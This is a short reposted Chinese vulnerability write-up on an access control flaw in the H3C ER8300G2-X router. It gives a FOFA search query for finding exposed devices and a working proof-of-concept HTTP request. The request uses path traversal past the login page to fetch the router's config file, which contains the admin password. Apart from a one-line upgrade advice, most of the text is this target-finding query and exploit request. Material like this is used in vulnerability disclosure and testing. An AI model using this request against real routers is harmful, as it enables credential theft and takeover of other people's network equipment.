漏洞影响:
H3C ER8300G2-X易受不正确访问控制的影响。路由器管理系统的密码可以通过管理系统页面登录界面访问。
FOFA搜索:
app="H3C-Ent-Router" && title=="ER8300G2-X系统管理"
漏洞复现
POC:
GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS aarch64 15236.9.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
返回包中存在有vtypasswd参数,告诉了我们登录的密码。
修复建议:升级到最新版本
本文转载自: https://blog.csdn.net/OrangeFox__111/article/details/140656087
版权归原作者 WZLN_ 所有, 如有侵权,请联系我们删除。
版权归原作者 WZLN_ 所有, 如有侵权,请联系我们删除。